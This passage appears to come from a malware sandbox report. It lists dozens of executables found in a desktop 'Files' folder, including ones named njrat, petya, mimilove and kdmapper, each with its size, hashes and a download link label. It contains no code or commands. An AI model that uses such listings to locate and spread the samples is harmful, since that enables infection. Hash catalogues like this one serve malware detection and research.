7f5d534bbce6a209e29d2a7398174a8f413a841b

SHA256
bce2e86654d078a54cfb2fe4e87418e0ff4d13ecb519b3b7fff3c42d8ecf36a6

SHA512
616db2a215018b42d59b2dd14fab9da8c4e2657707ac30c974286e84cb04979da7fe7cb8bb80f8df5c23f423159fb33b344694630feee46c8f8557c9b3c2ca4f

Download Submit
C:\Users\Admin\Desktop\Files\cvf.exe

Filesize
335KB

MD5
f322179f3d31eb10cb2e3172e47a71d6

SHA1
67376739a2e23e598a9f1fd743245cdb8e05bdad

SHA256
328f51ee1414e1bb065f01c9047c0fd47cccde0598d17f98ee8544bb0bf364f8

SHA512
ed963efaaff8bf951614379c544bc50885d1f657a429963f8d2e78740c60b159644465501f4e18eec374d3a1fe394c04577c882bf443bbe9f5ace9d5ee9bff4f

Download Submit
C:\Users\Admin\Desktop\Files\default.2.exe

Filesize
725KB

MD5
9ab4851cbc96952075b35c9393285959

SHA1
e0939de90d50087eb68a2e34b4781ff023c05ef1

SHA256
a1b2aecdd1b37e0c7836f5c254398250363ea74013700d9a812c98269752f385

SHA512
fbd1c782dadc483c64377af15fc89e01489dc7153b9fd3ca08e70d2189c902c77525a2c4be09f1784dec72abb426d343d970e236562c21464afecfc0d80dedba

Download Submit
C:\Users\Admin\Desktop\Files\diskutil.exe

Filesize
3.2MB

MD5
64037f2d91fe82b3cf5300d6fa6d21c3

SHA1
61c8649b92fc06db644616af549ff5513f0f0a6d

SHA256
33aab91831bba3a5fea7f49da16d5506254d66377d3074ff9457af4220be670e

SHA512
2a70ef0c4d3a2237175078f0e84cd35d7d595422c3aa5219d6f0fe876f82cf60e1d4f592a58f166cf8175c52d275c21950c5ea421416fee8877dfaec5b9be008

Download Submit
C:\Users\Admin\Desktop\Files\dwinx64.exe

Filesize
100KB

MD5
ef8cd2d2915fabbe1032fad585172073

SHA1
9239f5b980eaad7bd56105ff6ad3aa314dfb3434

SHA256
eb8cc7d6a2ac1b048250cbd78d7663f034e5249932a337b1298ccc0d120ef073

SHA512
84a195704bd9605ed42248ba1590abb6b028a9bddd5fe21d325b5441235585501b9496869b1b238769130eb9d989c31865d0b815eba1ba3ae9960e69378d2bbc

Download Submit
C:\Users\Admin\Desktop\Files\dwinxp64.exe

Filesize
1.5MB

MD5
011393e1dc0e2d3e6f5ec857ca92a88c

SHA1
c37fc886f51bc323979436e0ae7924edd661510f

SHA256
6dc22f5219df313970b7cdb63a64113f8be9a3edc80e9893eeff2987e9eb3623

SHA512
2fe5a52d300f3de860510805cb8c28e9e82c01e2da3526cdd29cc7fe3b2da6d062891c4e113309b2781231d5da94f67fe863b0426506a1a3119d1e224bedf015

Download Submit
C:\Users\Admin\Desktop\Files\e.exe

Filesize
462KB

MD5
8461e97514f42d93dccb4ec7f7100453

SHA1
ddb0584a3fcfa72e694ac30c06b7ac444644b863

SHA256
b43cc694d316e52b7c650b72e0d0e00ab4f9430305970dcdb19a6890c87ccf90

SHA512
d75d68ac42848d7c7141540fc9893f57e54cb399254565a6335be31df5bae65c3949319007b021aebf7deb21a36b1a7677d785b0d410d1e1f4427a91d30dd9ce

Download Submit
C:\Users\Admin\Desktop\Files\ee.exe

Filesize
348KB

MD5
ca3793c67c597ad1644a43ede3a94e78

SHA1
a8d5834901132cbe59f0e1b71a2ca330d3164ee3

SHA256
76230f6c110b11fc37b99758be26d27d1a4c945b03f0283f15e2be21d8b5879a

SHA512
47277c7fd4618bb56e289afdf91fbaa97b5042b385992f27e676ae7e2a656ecb1d0b1b993eefa33f2ebd246edb89906ffa4125113cf929042dd79365e7fc25ff

Download Submit
C:\Users\Admin\Desktop\Files\esign-app.exe

Filesize
1.9MB

MD5
538aeeefac0c750a2f506a6f3815c7ae

SHA1
4ae1eb347e7f73618824d1c5e58dd7f0eab31848

SHA256
383af7126e2e28748b4b75c66cc3406933a935931185d37b672a033cb193a26c

SHA512
ae7eb66f9e2e83442a72b9b837e3ab0d36fa16cf8b45609055d569d2d1e63c63190eb93079450a60fb3b908844144b186c6e180a0c586a7c82fd0f2290890c81

Download Submit
C:\Users\Admin\Desktop\Files\example_win32_dx11.exe

Filesize
3.1MB

MD5
a7d75b048989da5d22a1f7cca58edb51

SHA1
413d22b60ae540b3b11863e2107980b0403faf50

SHA256
884d0c2cefa850e384edd30c22b96dd9ca03443c7c57bdae7d6234c2ebf0d0c7

SHA512
4a453dc7f2a0e82d66fe5d73727ab2a23b5f00ea1b4a53032e4a538b72edf9caaf0894774d0fafb4af401f74a0b65bbf2d83a0cc643dc1a66ae23fb2136dd351

Download Submit
C:\Users\Admin\Desktop\Files\fff.exe

Filesize
991KB

MD5
beb1a5aac6f71ada04803c5c0223786f

SHA1
527db697b2b2b5e4a05146aed41025fc963bdbcc

SHA256
c2d045884d11777182129a96557ffc118ef0e8eb729b47766b4e003688d8c9c2

SHA512
d0fa9b0f749c0b78a491ad44990733f1d1292ca9b5a45fe8fec750fa716a067bf9926481e8a4a131063442c92f7671145fae2238f32bd1f444920f3ed8a9b243

Download Submit
C:\Users\Admin\Desktop\Files\file5.exe

Filesize
648KB

MD5
38836c26314605862f3ca3bfe0936b46

SHA1
b68d2a35b2d9f5083e3b2574ec409c6dbb615fd1

SHA256
3e151c518a16e949c618995aa6e38f509ff95f4fcc0f2a84a13a64f310e34e1b

SHA512
dc0aecfe210fd1169eea3118ca09de6dcb4e53ad6a7aee25580df1b82b224fa551a4c961756fbf0a415ab77aec2a26867cfd16fe0358bb1024da80b9e7bdc67e

Download Submit
C:\Users\Admin\Desktop\Files\foggy-mountains.exe

Filesize
96KB

MD5
6f14b9ed58cec9d707c4ea0106153c34

SHA1
603af9400d9f29a57e0eb271d94a2a9c50adb0ca

SHA256
5b7c5dfcba68530926eb41bc37a15ce26d0f96f50c97842417e2183615120e23

SHA512
586c192f22e283029acada77605a38ce90ce10c4354640cbd5319f902c43881555ad583a05fbdb0fd2640c3621a3d7c34696f8ee03c3ef81ebefaadeef87f9d2

Download Submit
C:\Users\Admin\Desktop\Files\fusca%20game.exe

Filesize
235KB

MD5
6932b7496923927a168f33e9c584df04

SHA1
12efc094c2b3e1f1da263751baeb918e892faf2c

SHA256
6cbeec3d5e443abf3dd88847fa7ba3e4cc716ceb39f1bb514e32b9295dbc8529

SHA512
c2bf4f24ee785c526f9bea8e2d1a427008ed5e6d47eb9065d32b7c0fc12928d6de4377b33f9e683676cc2f38e59da269987b4c7d8fceda6d263afb873eb3eb77

Download Submit
C:\Users\Admin\Desktop\Files\game.exe

Filesize
7.8MB

MD5
40e731fa340d706a36ee0068ec537f4c

SHA1
6e905d9f989f1a3d6260a959ded3281d415772dd

SHA256
1d2a753622829bafeb063a24d09abb79af4b4f0eb66077e4556513793b1e3e9f

SHA512
d985204191db1d7b4ca87992f32d7a3a61f460b4c8719bbd80e64cea48231391832efde981b55274778c71cae7888fe0bf555cc22e45ec266dcf472b8819c585

Download Submit
C:\Users\Admin\Desktop\Files\hack.exe

Filesize
40KB

MD5
85c26f8ddd62f0bc481621018ee53828

SHA1
d43b3bab4e5be0691cc33b10fb733799e42ccd90

SHA256
04df02c6e3e2ddd7169acee434a234c737e42d14bbeb3687449e25ea5a00f21f

SHA512
d3d38c6796948c83683bcc54ed10377441e0652782311f7b6ab1bcc661fd6d1c8ab2dd373ea857c6d6e1fe3c0c4177bff9dd1925d2f48c934bf124d233daa874

Download Submit
C:\Users\Admin\Desktop\Files\hack1226.exe

Filesize
63KB

MD5
d259a1c0c84bbeefb84d11146bd0ebe5

SHA1
feaceced744a743145af4709c0fccf08ed0130a0

SHA256
8de12184a006d3340241492baca0ba1034182b08d3c6a0f09c0af99d539bd48b

SHA512
84944d132fb47be7d22e55456bc1c4bbb93ce281b775e57641a012602f77219c6a9c75ed67ca1fbec1ee15550dee58b9a8adeacbe136e58d2ed1f4c6b755fd54

Download Submit
C:\Users\Admin\Desktop\Files\injector.exe

Filesize
2.3MB

MD5
f6aaabbe869f9896e9f42188eeff7bd0

SHA1
1efcc84697399da14b1860e196d7effc09616f45

SHA256
0a0051921bf902df467a3faf3eb43cee8e9b26fbc3582861b2498ec2728bb641

SHA512
7e95891540121e2c15b7f2ce51155fc3a6feefb9b493e2aa550a94b6a00f25ac47a946beb5096bdd6ebc2ac8eeac606f8e372f07d56bba3d697552b2f330aa10

Download Submit
C:\Users\Admin\Desktop\Files\installer.exe

Filesize
1.8MB

MD5
0a8adeb2a920018630e1682e37cd1bf2

SHA1
0e4741b2df82d3555cb0970c2dd2b9a889c5f3aa

SHA256
a5e8c4faafbc0cec6ee07326aa8e984c8abfc1921bf8e44d956212801d3d9a7b

SHA512
1574038ef4e8bf5957d411298d24f601e1d4bffb8babc3500035d8a7e1b5a210a13775bc7a4ffdd690fe8dc2a331f01b71087a8d4efee44027375223357cd5c8

Download Submit
C:\Users\Admin\Desktop\Files\installer.exe.exe

Filesize
3.1MB

MD5
d228d9c94c9e9b9e94bcaab2f8711fa8

SHA1
6b4800ef23217ff864ad59ee401c63535a35766a

SHA256
83fa36e3a01bf4ab3fc03e0a08782273e38e6a724cb1152179696494b44ab730

SHA512
6c74e6dae4f6bcc7604f13f5a7a694b719481c4e82b42092ccc99747f45975789f0b671a1425fa1156dc3ba14d26d21f0e00d3be939c9601c2a3b1e2d27131a4

Download Submit
C:\Users\Admin\Desktop\Files\intro.avi.exe

Filesize
348KB

MD5
d219d94cabaa00e5abffc599bdeef75d

SHA1
123e511de20beab7bfa2bea5c2206422bc5e8241

SHA256
3cc847687e60acda504fc35577f36eedd0bca559a4de915d6dd88db9178567d4

SHA512
82dbb2484e3e42fcd6c3914da4ebfc540e135b8b57bf240a28a3e9fceb6409d8a9b1f9ca9b4bf545d05a10fd9b1672a2a6a05d963aaa33f4905e74cc1c068734

Download Submit
C:\Users\Admin\Desktop\Files\invoice.exe

Filesize
826KB

MD5
57bcb61167abd03d9d98705ab39e79ab

SHA1
487af25088915c0506635a7bd44cd65177f91689

SHA256
7c321f8a0d6c357d3406afb96408968d107c81f8282e2353ea4cebed67432f88

SHA512
45779c2b678df42f9f3e36501e95a17c32c5a0a694c03b5caaf2014d07aba79b569271a6bf83a0e87836c3f78f140ab3b50bb2d7eb21de44d01bf547b249837f

Download Submit
C:\Users\Admin\Desktop\Files\jajajdva.exe

Filesize
320KB

MD5
4f0990ea72c03f3911be671cbceb7fda

SHA1
d07332f930099c4af178e4c4adcdf166decdce91

SHA256
b9e894c975b74265c0c359706931d61227c1ab7074cdf981d2d4a5ceacda9290

SHA512
903b441d433b39fb8b2d3cfd658261ad2c62d51e5171b0d1cfc37d058a27c946209b2fc1d9ca4ab3ef369753339a6c6d3845e95249d3b77a08caa2099c40e63a

Download Submit
C:\Users\Admin\Desktop\Files\jeditor.exe

Filesize
259KB

MD5
001d9e4a35ad697aa884cd3db3c3df84

SHA1
5ca40b8ba5b8b76dd0b45c5ec02fb5cb7697fbf9

SHA256
05059c5abd4a2791759e676ff7148287eaacd204de16b1970042ce57649afe9e

SHA512
5de68b37780cad2fb93f9a39eb331e8a7aff972c43968346d6223e33c82a838bd8b1454fbaa4d77a1f8db76e4bddaf4b35c3e9efe56f4169e1d4533a2c3d0a04

Download Submit
C:\Users\Admin\Desktop\Files\jrockekcurje.exe

Filesize
288KB

MD5
8a306aec318555fc080f94d5b7a9a2d0

SHA1
94f093f15e0b115bbc9dee803c68c104dcb54524

SHA256
f3b37b062dac443be97891f5ca9992c41ed61d5517a85f9920a677b3660566fb

SHA512
0fe708d879397787eb5c80f0b96d0e18b3264f81950e987d47669a73e49bc5fdf3c8260d6ad1d7f646b6c71d279c63d9b2e9f1fa5e17bc23d8177ef94cbe46d9

Download Submit
C:\Users\Admin\Desktop\Files\justpoc.exe

Filesize
5KB

MD5
d9f19b99930397e4a07201ae70e527c8

SHA1
f9a48ddbe15d3d8d34cddfbe8d246d7d1b841216

SHA256
f58b95ca013aee22037b7d90c217d412b9385bf7f808ecc1d5ffda9aed65924b

SHA512
c729d78e2f0c2cafba99caf9ad8d09f12afd4f56897b72a3e6c785efed03681d14ffabe282b90c2df7b00535b4b5575d44bec73837b4e097b8fa198317a26759

Download Submit
C:\Users\Admin\Desktop\Files\k360.exe

Filesize
146KB

MD5
5645f4739313841c6af76fa40d1a2d95

SHA1
1fdf5d9e098fba6d49893b89eb8ca6a3ec7b8477

SHA256
fcdf15c6c5100c37876317cb678b4b2021dfa502e0d9872600c3060a3fc284c4

SHA512
038e74667a280be2ed4b9d3afb0711d6574a1316b73dd6a578e3e3066080d166d0e66755b150f4f77cd8b471c1d7a84bb023d4ac34d5cd380ce350b3ae570916

Download Submit
C:\Users\Admin\Desktop\Files\kdmapper.exe

Filesize
134KB

MD5
54d024fff14ecf2068b43d9ce52ad66e

SHA1
f84b57ac51377b0742e88f565221177710bc5def

SHA256
4bd506c3b40b8d614aeac97bf7abfef595544b6fdbd20b495ad6a694efa85ff3

SHA512
b99cfd043192600718a8491d600693f78af53bb7c02c376bf2404dbc85ca9799c44268ff4cb624c0a06edcc6351ffd84a5766c19143be3afcc8f3ed34acdc909

Download Submit
C:\Users\Admin\Desktop\Files\kdmapper_Release.exe

Filesize
143KB

MD5
f6d1db953f9d3e0014f770feea300357

SHA1
57b37399fbc2cc0c8e120b9feafefbca080487fd

SHA256
11c14f362a03e58914d9ee9dc1d7c71896a0f590578f0593ba56721c0f00d0d0

SHA512
c915b82c0b233ea0343d5fc1440cf16ca538ebd36de0da682422afc321eccd6fc9a671ffda1884ac0a1942604c65840e518634c6b96b05c9dab9dbc39c5418ca

Download Submit
C:\Users\Admin\Desktop\Files\ljgksdtihd.exe

Filesize
351KB

MD5
0e734311dc9493fa01bbc101af62f89a

SHA1
e4b7a5ca7c671f1d0143d62321d0c89f00515fae

SHA256
ed573cc05d313e7945ea333a405391e00e64be29b5da5f3a2ace1cc27864bd48

SHA512
8f469269e5ec771e58614e84e960adc1d037045abb47e89719ea597b2458e78fde8e23baac64dfd6c3db0437e53677d1ea866e0c215aebca07dfac72ed260e9b

Download Submit
C:\Users\Admin\Desktop\Files\loader.exe

Filesize
6.6MB

MD5
2eb5987be2119cea2a089d65a5917493

SHA1
dcde236cbb6d3520bf4c0954e7d8c286b1531321

SHA256
1cdee449f45d4990e9afb12836f586604ce8435f90e641796444d26e81a9d9d1

SHA512
95336ffe3fb0efb63099f2c28215869aa0838b459c774bea8d97887486ac7c7510411bcecac5cfabfeb25bfc7208957b9089e35411e67a19454d340cd7bc1ff4

Download Submit
C:\Users\Admin\Desktop\Files\logon.exe

Filesize
157KB

MD5
ceccc726e628b9592af475cc27d0a7ae

SHA1
478017f997d17d3ae1a22a4ea141bab80dd436ad

SHA256
ccb40eb0137e156af89b0e0dbdac4192152dd19540efecdb56eeaa0384e5d55f

SHA512
6d446f2ba5cef727d6f847428c8ea355ee21419a79cecda040002186621a69c0eb0cbde51a38d510a2fe76e5082afa0571475028428a00edebb12bdb6f2710ce

Download Submit
C:\Users\Admin\Desktop\Files\mimilove.exe

Filesize
24KB

MD5
c67f3497c310c01018f599b3eebae99e

SHA1
d73e52e55b1ad65015886b3a01b1cc27c87e9952

SHA256
cc585d962904351ce1d92195b0fc79034dc3b13144f7c7ff24cd9f768b25e9ef

SHA512
1205b5a9a9d2f3fabcce7e53e70e4efce08b21469ae64120beaee67a828d12eeeecddc623b453105ed15990fcc7bbce53175eca6545007f9d68c0aee66e55bc0

Download Submit
C:\Users\Admin\Desktop\Files\mixseven.exe

Filesize
5.7MB

MD5
b3dbec41ee7d66679d2a6dfd87bc8d8d

SHA1
7850549666e02c5cde7bbbe62872575969b3a1f7

SHA256
5316d399e974a1d82fc6556c809617847a429aa0417531a82cbd8a1ec066973f

SHA512
6eebbbcbcbf96866e9f33eb0453faa443b08ea2c44d6f36b09549f0a3b823e7ea72af0b0fdf0ab28ba416dca0f46cb284a3885adbe91360eb9735d22bec35ebc

Download Submit
C:\Users\Admin\Desktop\Files\mobix.exe

Filesize
1.0MB

MD5
19b23daba4b1f95944ec1030b5e73da4

SHA1
b7d66f20397af679a632cd4f772fee3bad7edc64

SHA256
266a87a66dcf16272f5d1226e46bf739345b1ff4abb703c536233bfa596f3030

SHA512
b57d29fdc0e62a32d48a3808563ee6be9719b960b88007c866ed0f05f51f2d58f3c97eb42fddb695f561a2611d23440c398d71f722d4ff69d430136e137bcf3e

Download Submit
C:\Users\Admin\Desktop\Files\mos%20ssssttttt.exe

Filesize
93KB

MD5
8be7cd574b5424c43a6d0ccc4a989412

SHA1
946d22547849765d756071f63be3417b30f39c6f

SHA256
87a40d2e8ebe033ff3d359309dda136f1bced5c5578c8ea7d05b9d97e5adb12f

SHA512
8aff9965a7c8ccb357b3e026c2b65eb0457d4967ddbbb269f781ce62c9c77667b3a7ed4e8794bdaff6a7adfd46757cf1579bf740ec5a0d2747efa824bcf18eeb

Download Submit
C:\Users\Admin\Desktop\Files\namu832.exe

Filesize
499KB

MD5
db4e86f29a9589726fe410d8439d8374

SHA1
20875601b58c8bc23cac94e9289ba523c57cd21d

SHA256
d4e4ae5e66cfc21c33e29f710d2ee80afed162927ce14f5072db8c6503721c9e

SHA512
e70f8ea05a38f45a72d858b5ebaeeb6df7367c199a3aa40936c41a0932643f7c837a9c6eefe376abe440e85777e29ca09fd7edb72e363607f78123709f2387e0

Download Submit
C:\Users\Admin\Desktop\Files\networks_profile.exe

Filesize
4.8MB

MD5
ce4c3949686f23b9ae724cf296df7644

SHA1
5fadd04b0382010899c06d60628c6971f1efc1c2

SHA256
cdaa321450a761116623543774ee754c99f5f2cdf8ca7bca574458547ada5351

SHA512
e62fcd540638e5b4c3155f7faaa3867c8298e979b0db78deb940e59b464b7cac9feab8352938285d6b04c2e820283a29e9d42d4a5574ead36896395ff511b3ee

Download Submit
C:\Users\Admin\Desktop\Files\njSilent.exe

Filesize
37KB

MD5
e20a459e155e9860e8a00f4d4a6015bf

SHA1
982fe6b24779fa4a64a154947aca4d5615a7af86

SHA256
d6ee68c0057fd95a29a2f112c19cb556837eff859071827bc5d37069742d96cc

SHA512
381a3c27328e30a06125c2fa45334ca84aaff7904afb032e4fd6dec1474179787f0d87e93804b7b79e74987e2977ea19d64de05872c7f4fe1ca818199ed30d02

Download Submit
C:\Users\Admin\Desktop\Files\njntos.exe

Filesize
31KB

MD5
b510120966ae2b95f96e34dffb58f277

SHA1
d41021338292ff9860150a2c11af8c1c60027cfc

SHA256
26d66fabea48da55d5fc15a9f7ba07c8e0f28cd3050a20fe5b80c5ab94288037

SHA512
6a8641bed87afe798f1464bff5d786489c94d0543cc4a414c4e3416fe6d3771ff0c12de83b3731f25abc3ffdc616434dfe299e4c56f89f9e7257be84f0ff5449

Download Submit
C:\Users\Admin\Desktop\Files\njrat.exe

Filesize
23KB

MD5
8a71e8ebf8c24d8f7b48a29fc023815e

SHA1
3c279527d5f1dba32466fbd19b7d073df291e596

SHA256
36882afaff37f70be8d2566f1b4f8a05764c27305f4809002f1ee2822b6d8ea5

SHA512
258c88e0993258f091b5ce3bd57aae8be0d8f30be0f420aea08bad9a99242e1f246a6c140c933fc088b6ada2b1046f1195c3030593ce1338fb77925452348a4e

Download Submit
C:\Users\Admin\Desktop\Files\oziexp.exe

Filesize
2.7MB

MD5
6cb416a4c3759631d61684e6a2892b03

SHA1
0f4e0ce7c7f8805ef99251c93e6c6c18526e5b10

SHA256
d53a36481eb74cf5355c15da244bdbbcfadea91d57c3233226eacc05f3fdce0e

SHA512
6f5f4f167b334efcd3c85c12edf614c314f36538d4ce00e6a3b8d49d516eb657e00b07c721642fc65183ab9591d8808892adab0f16731edda814f29bcf0ca341

Download Submit
C:\Users\Admin\Desktop\Files\payload.exe

Filesize
278KB

MD5
4161933db29f115083240097de574bc5

SHA1
219724f70ed21b3729b08076608cdf9551206ee9

SHA256
f56dcf7ccc7c047dade761726c71eea39555ed0bc9a362507856b5dc011a4795

SHA512
07be56c2c28115b64a4471a4d5f02352d3c87223ddfe5e9b89a9df98c8215951dc39bec0585f8f9821a7c81131845dcf5fe90be0524e9ff277c39cf81104c90e

Download Submit
C:\Users\Admin\Desktop\Files\petya.exe

Filesize
1.2MB

MD5
cbe6a0a06ffe4254df06daff8f77136c

SHA1
d3ebc38ca24f0b96151dca9e0ab0ca40a5399842

SHA256
ac931f9419235283f509bbed222918c34b72cfd8f29c83af5ad35d249f42c41c

SHA512
1a159604a73b8880f887afc909ea910ed25c792e5ab4e36ebc8defaab0e206112b726c91115088d9a06644442201e70af229acc13ed85c8a082cdcbe79ec4772

Download Submit
C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe

Filesize
429KB

MD5
108530f51d914a0a842bd9dc66838636

SHA1
806ca71de679d73560722f5cb036bd07241660e3

SHA256
20ad93fa1ed6b5a682d8a4c8ba681f566597689d6ea943c2605412b233f0a538

SHA512
8e1cdc49b57715b34642a55ee7a3b0cfa603e9a905d5a2a0108a7b2e3d682faec51c69b844a03088f2f4a50a7bf27feb3aabd9733853d9fb4b2ee4419261d05b

Download Submit
C:\Users\Admin\Desktop\Files\poY.exe

Filesize
476KB

MD5
ab8751627bfc89b03e3028a2964527c2

SHA1
196b98c4dfd70819304ee8b963b1d895d8f76f83

SHA256
acd720a89330f71ffd60bb6c0f47d9fccb4231fabc8e1eb5ade8d6678b0965ea

SHA512
153ff08774a6df171171b4015dbe12720226c1787cbdab4d0d4809af7dfd8024dc6076c3aa1cca7ea04b42adb8a4b25c9e15608c41fc15f6adfd0502bec657b3

Download Submit
C:\Users\Admin\Desktop\Files\popapoers.exe

Filesize
212KB

MD5
d9a23524fc7e744b547ee35a00c80cae

SHA1
ac189d3ed4a5c8d094dbb0f9197c88f92f567929

SHA256
b41ad61bdf186fe82b70dc045791e0bab5d9566ba56b010b19c494dbbd70db31

SHA512
f815ad8516aa3d4c4f35abc2a42b8e6119cd2a022d9475e2c9cc25649736a89cb7b46f2b3def79bfdcb82bc9798de397a8b95f6fe04ba337c90d1c1b85cb4861

Download Submit
C:\Users\Admin\Desktop\Files\pornhub_downloader.exe

Filesize
88KB

MD5
759f5a6e3daa4972d43bd4a5edbdeb11

SHA1
36f2ac66b894e4a695f983f3214aace56ffbe2ba

SHA256
2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d

SHA512
f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385

Download Submit
C:\Users\Admin\Desktop\Files\prueba.exe

Filesize
429KB

MD5
f20d14ea889df6490d81db79d57a9b19

SHA1
c9654e2a5e67205c4a7e3cac67676246bd9735f7

SHA256
ae9384f6fc3fea2276f6897e910a5d5b7a3ad995420363788815e0754ff9469f

SHA512
5c251039426f083a7480c7bfb6339a017979fca5ad0ea318fc7e9da23a74a58729c916d300759733343c6e48c8009fb48b46c744b94ef3b0048e09cb204779df

Download Submit
C:\Users\Admin\Desktop\Files\rah.exe

Filesize
3.1MB

MD5
b2f04c45d0ec66fc936d8dd74bc922ae

SHA1
72e36b45cfd4aa3b956c11013a16859418c1d9a3

SHA256
e34c17adde703b208c6c2c3e96581ba9456d16c8c2acd1a70136e3763c4e3267

SHA512
7f9548ce63c73921e09af94698a8e1a008b12c63e858baa01cce6a426ada437218c91c9a020c74e5cf27d33574f373a566dec9938038694c537645988998aef9

Download Submit
C:\Users\Admin\Desktop\Files\random.exe

Filesize
1.7MB

MD5
b85bcb0a55d94f007313af8cb542d112

SHA1
424eb624f383cf34eb7ebd1c82f3e6eb9458bc67

SHA256
56a221c1e0e0c058a49e8226615d0c8e480326906b2e3fe7c8e2788dcd943779

SHA512
f8ed3ca995e9583f0db10607af1f68afe3d0b333e9838f3e93d2082000ec399ac142f82aeeb982aa5fd6b14c9b03c71a5168f8d017aeb6f12fd52d5645be59da

Download Submit
C:\Users\Admin\Desktop\Files\run.exe

Filesize
88KB

MD5
4c2bc1df6a253aeedb93fca6703c944c

SHA1
f9b33cc3ead7af759cdd205f489ec29fde4c954d

SHA256
daaa52e4529cd43d8293010ad6125dff9ccba7cacdeea7f6d0dc02572e682b5f

SHA512
145217ec581c2597dc066684f68f119f0a2579f7e9000d6cc1760c411e6a73ed7b957479ea53b56899fefb99ddca98bca91d1b8fc43cedefa49ed95a7c173944

Download Submit
C:\Users\Admin\Desktop\Files\savedecrypter.exe

Filesize
203KB

MD5
f3a55d642b29d5e6fc09d0cb3fbc7977

SHA1
15b8a9cdf8c4553626b27e55552b426c9986de0f

SHA256
d2da6a437828e06a68fb1d9ec12df9bccd142b5f5fb0f489efb2234092887dab

SHA512
8beaecd389ca34e03eace71dfc4be4b9615046eeec8470f87b1ffda92307a4f31ecaf0f0f94481746dfaa55ebb445d3a39b1ff0c517748279cc6b56a73810594

Download Submit
C:\Users\Admin\Desktop\Files\script.exe

Filesize
6KB

MD5
308d9beab0eccfd8f218a89456b9b7d4

SHA1
b444fa187f2762104248a6ad7d82b1e9e145e366

SHA256
3570eab57ac55e89ce4467d665502896790881a21e93a25aabb738fa368e9e02

SHA512
b74095e5bc85fd4aef7685a18d4e7c64c322ba66823e8da6cd96f8551abf10f6376ac32728d33f72eb616e25587b442ff5a03866821151d64ac2102cffe68955

Download Submit
C:\Users\Admin\Desktop\Files\sdggwsdgdrwgrwgrwgrwgrw.exe

Filesize
45KB

MD5
b525ea79a587def213905cf77f2b5e7e

SHA1
08211f74b221764ad5e0ff24c914c8d8bf0fdedb

SHA256
7d11842cce74194adfff7709d7ba3f560dd381dc05b79810ac5c08bb220e6556

SHA512
dc9ff41591b455589a97f09245b2a70fccb1a68f1176696f386b634511f8498df8d549d9e931919c7e598586251a6552f118f0a439e4e708568afb7a0e7f46b1

Download Submit
C:\Users\Admin\Desktop\Files\self-injection.exe

Filesize
9KB

MD5
d980b644f0f4b8a3da86f854aa695df5

SHA1
364cc469ccc11a0faa812e1e0dd00480ee7a3e6a

SHA256
d816db15ccd6b15dc1a369f0fd460d4bed0ac21e2694379cdc96cf4781fd6b0a

SHA512
20038564c443a8f87ff36eef6a0659add3d6e47de065630ed1e35e06492ab34d68858c3164c41ed7412315287b01318196e4107bb617f5cd7c0f82e78f5a5329

Download Submit
C:\Users\Admin\Desktop\Files\sharp.exe

Filesize
145KB

MD5
d85182eab218d23a09fb64c75fb7413a

SHA1
5cea790d53710a414c2351e57039f649de074a32

SHA256
30ac89bbc88577e708c6a37fd3bf2fad7d3af925a4558148396f1dbdcced2af5

SHA512
3f52f2d636c8cbac3cafc2a2fa740fa5741d6ec0876b6c0125ff78e163edbcde3343d09be49196dbc82b81dc824a7efe4c3a5e9007a8369785475310f8bd00c1

Download Submit
C:\Users\Admin\Desktop\Files\shell.exe

Filesize
72KB

MD5
b46f3e8790d907a8f6e216b006eb1c95

SHA1
a16301af03d94abe661cc11b5ca3da7fc1e6a7bb

SHA256
f400dfc798338bf8c960fe04bafe60a3f95d4facd182ab08448b4918efe35262

SHA512
16345afb33b8626893da0700b9ac7580cdea3b3d42ace6d137abb9f6e99a0e446d9af2fbb98979b7ea815cab07fb6eb368a590166bdf048deacd7fd63c429de9

Download Submit
C:\Users\Admin\Desktop\Files\spectrum.exe

Filesize
502KB

MD5
1441905fc4082ee6055ea39f5875a6c5

SHA1
78f91f9f9ffe47e5f47e9844bd026d150146744e

SHA256
1b05c4d74e0d17a983f9b91aa706a7a60f37ec270b7e2433d6798afa1c7be766

SHA512
70e9ab0e49b4bf89505f16c499538daebc1e8da72488cd63ff60747d15a1d486ba38802b0622c9240d10ff68ab32e6bb36a0b809e7cd0e2ec4945d023ce86c5c

Download Submit
C:\Users\Admin\Desktop\Files\spoofer.exe

Filesize
173KB

MD5
4cc30fd90a582acdcffa957af45d48f7

SHA1
8249a400c7efaa2b71acbf843ea60ca787d8d19f

SHA256
30ab33b8353c20887ac2d0e3a9dcd52a154b7ed53dc57a46fd0fd9f11cae9d4e

SHA512
7d8235f9b89069919a5e7d3c243d48aeef5e79597fc1eb79b08ec318d75d52405c0b8c096af5eaab5acfa671617c7d6b75225e596c8d8f6b2a8fad55b8ade9ef

Download Submit
C:\Users\Admin\Desktop\Files\standalone_payload.exe

Filesize
182KB

MD5
36f989a4f1d32d775a85d560dec29f60

SHA1
62b5fd603569a6f5bef1828354062e4dbe4f8a0c

SHA256
d2819a6f7dec9aaa0ef2a0193d83da526b8945cf2a6eacd7e87c08e2e01af9c6

SHA512
7cd359d7e4f1c1c7269af70d582436d9e95fec4cdfa60873866404b9da15fff15d9f897e8ffa87f48680b532559685fcf5b9b92e52de99859e056694e915a25f

Download Submit
C:\Users\Admin\Desktop\Files\steamerx.exe

Filesize
8KB

MD5
695e9d580533372fb131ed51f8321c06

SHA1
c63aa86d1fe306f38d94621247b578819a951860

SHA256
cfbcae5f183d4f254603b0c2fcb66a9da2d8db663c92d9203e525f41704f4c89

SHA512
7185e34d3ab5b30e9a6c20f995fb4e90c0a0a0fc60c0febf2ab1c97e90803b428d88f6011b38918d782f4d5a15d4b6e53c359435aa25ea56bc1468fc1848680f

Download Submit
C:\Users\Admin\Desktop\Files\stub.exe

Filesize
3.8MB

MD5
8ee8f36cfddbb4aeb1388191cfca4e90

SHA1
742516898c7ba788f889c2a3438a37a354524577

SHA256
a1d460867b08cc04ecf499c53f72acd1ac2ae4a0d28ea72bdc2b7a8a0a99b704

SHA512
d84fdac4f0afb9e3e2eb13a14f4753e992ebadc00f1ad87bcf44a7fb41e38b282db7280d8fa9d9c829ce3a314688ca013566d57c3d3ec51c4a3f068e7e65c5b6

Download Submit
C:\Users\Admin\Desktop\Files\support.client.exe

Filesize
82KB

MD5
8eae2bff6fee23bb1bd3914286947d1b

SHA1
08bc01fba77805fb76f25b31639506c53fdd52b5

SHA256
